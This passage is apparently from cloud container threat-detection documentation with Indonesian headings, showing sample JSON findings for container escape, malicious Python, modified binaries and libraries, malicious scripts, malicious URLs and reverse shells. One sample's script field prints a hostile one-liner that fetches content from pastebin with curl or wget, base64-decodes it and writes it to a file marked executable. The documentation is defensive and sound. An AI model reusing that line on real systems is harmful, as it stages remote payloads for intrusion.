      "parentDisplayName": "PROJECT_ID",
      "folders": [
        {
          "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",
          "resourceFolderDisplayName": "FOLDER_ID"
        }
      ],
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_FOLDER",
          "id": "folders/FOLDER_NUMBER",
          "displayName": "FOLDER_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "ktd_container_escape"
    },
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1729291973",
            "nanos": 687426149
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1595/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal File Link",
          "url": "https://www.virustotal.com/gui/file/21225e29b4225a4eca16996445e243fdab8051a0ad4bc232b907ef5e9b67f66b/detection"
        }
      ],
      "relatedFindingUri": {}
    }
  },
}
    

Eksekusi: Python berbahaya dieksekusi

{
  "finding": {
    "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Execution: Malicious Python executed",
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "2024-06-17T18:50:13Z"
      }
    ],
    "createTime": "2024-06-17T18:50:15.454Z",
    "description": "A machine learning model using Natural Language Processing  techniques identified an executed python script as malicious.",
    "eventTime": "2024-06-17T18:50:15.217Z",
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "2024-06-17T18:50:13Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER",
        "PYTHON"
      ],
      "additionalTactics": [
        "COMMAND_AND_CONTROL"
      ],
      "additionalTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "3492656",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "3492656",
          "partiallyHashed": false,
        },
        "script": {
          "path": "FILENAME",
          "size": "4191",
          "sha256": "SHA_256",
          "hashedSize": "4096",
          "partiallyHashed": true,
          "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",
        },
        "args": [
          "INTERPRETER",
          "FILENAME"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"CONTAINER_NAME\""
          },
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "Process_Arguments": [
      "INTERPRETER",
      "FILENAME"
    ],
    "VM_Instance_Name": "INSTANCE_ID",
    "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      },
    "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
    "Container_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 0
    },
    "Pod_Name": "CONTAINER_NAME",
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Parent_Pid": 1,
    "Container_Name": "CONTAINER_NAME",
    "Pid": 7,
    "Process_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 762524370
    },
    "Environment_Variables": [
    ],
    "Pod_Namespace": "default"
  }
}

  

Eksekusi: Biner Berbahaya yang Dimodifikasi Dieksekusi

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/file_to_be_modified\"",
          "\"modified-malicious-binary-da2a7b72e6008bc3\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Eksekusi: Library Berbahaya yang Diubah Dimuat

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/malicious_files/file_to_be_modified\"",
          "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Skrip Berbahaya Dieksekusi

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_Content": {
        "primitiveDataType": "STRING"
      },
      "Script_Filename": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

URL Berbahaya Ditemukan

    {
      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
          {
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
          }
        ],
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
            "testsafebrowsing.appspot.com/s/malware.html"
          ]
        },
        "kubernetes": {
          "pods": [
            {
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
              ]
            }
          ]
        },
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
            "INGRESS_TOOL_TRANSFER"
          ]
        },
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
          {
            "binary": {
              "path": "\"/bin/echo\""
            },
            "script": {},
            "args": [
              "\"/bin/echo\"",
              "\"https://testsafebrowsing.appspot.com/s/malware.html\""
            ],
            "envVariables": [
              {
                "name": "\"PATH\"",
                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
              },
              {
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
              },
              {
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
              },
              {
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
              },
              {
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
              },
              {
                "name": "\"PORT\"",
                "val": "\"8080\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"HOME\"",
                "val": "\"/root\""
              }
            ],
            "pid": "1"
          }
        ],
        "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "severity": "MEDIUM",
        "sourceDisplayName": "Container Threat Detection",
        "state": "ACTIVE",
        "vulnerability": {},
        "workflowState": "NEW"
      },
      "resource": {
        "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
        "display_name": "CLUSTER_ID",
        "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "project_display_name": "PROJECT_ID",
        "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
        "parent_display_name": "PROJECT_ID",
        "type": "google.container.Cluster",
        "folders": []
      },
      "sourceProperties": {
        "Container_Image_Id": "CONTAINER_IMAGE_ID",
        "Pod_Namespace": "default",
        "Container_Name": "CONTAINER_NAME",
        "Process_Binary_Fullpath": "/bin/echo",
        "description": "A malicious URL is observed in the container workload.",
        "VM_Instance_Name": "VM_INSTANCE_NAME",
        "Pid": 1,
        "Process_Arguments": [
          "/bin/echo",
          "https://testsafebrowsing.appspot.com/s/malware.html"
        ],
        "Container_Image_Uri": "CONTAINER_IMAGE_URI",
        "Parent_Pid": 0,
        "Process_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 7717272
        },
        "Environment_Variables": [
          "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=CONTAINER_NAME",
          "DEBIAN_FRONTEND=noninteractive",
          "LANG=C.UTF-8",
          "PYTHONUNBUFFERED=1",
          "PORT=8080",
          "KUBERNETES_PORT_443_TCP_ADDR=IP_ADDRESS",
          "KUBERNETES_SERVICE_HOST=IP_ADDRESS",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP=tcp://IP_ADDRESS:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443",
          "HOME=/root"
        ],
        "Container_Creation_Timestamp": {
          "seconds": 1663191345,
          "nanos": 0
        },
        "Pod_Name": "CONTAINER_NAME"
      }
    }
  

Reverse Shell

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Reverse Shell",
    "sourceProperties": {
      "Reverse_Shell_Stdin_Redirection_Src_Ip": "SOURCE_IP_ADDRESS",
      "Environment_Variables": ["HOSTNAME\u003dreverse-shell",
      "KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443", "PYTHONUNBUFFERED\u003d1",
      "KUBERNETES_SERVICE_PORT\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS",
      "PATH\u003d/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/p
      ython3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
      , "PWD\u003d/home/vmagent/app", "LANG\u003dC.UTF-8", "SHLVL\u003d1",
      "HOME\u003d/root", "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "DEBIAN_FRONTEND\u003dnoninteractive", "PORT\u003d8080",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Binary_Fullpath": "BINARY_PATH",
      "Container_Creation_Timestamp": {
        "seconds": 1.617989861E9,
        "nanos": 0.0
      },
      "Pod_Name": "POD_NAME",
      "Container_Name": "CONTAINER_NAME",
      "Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
      "Pid": 15.0,
      "Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
      "Pod_Namespace": "default",
      "VM_Instance_Name": "INSTANCE_ID",
      "Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
      "description": "A process started with stream redirection to a remote
      connected socket. With a reverse shell, an attacker can communicate from a
      compromised workload to an attacker-controlled machine. The attacker can
      then command and control the workload to perform desired actions, for
      example as part of a botnet.",
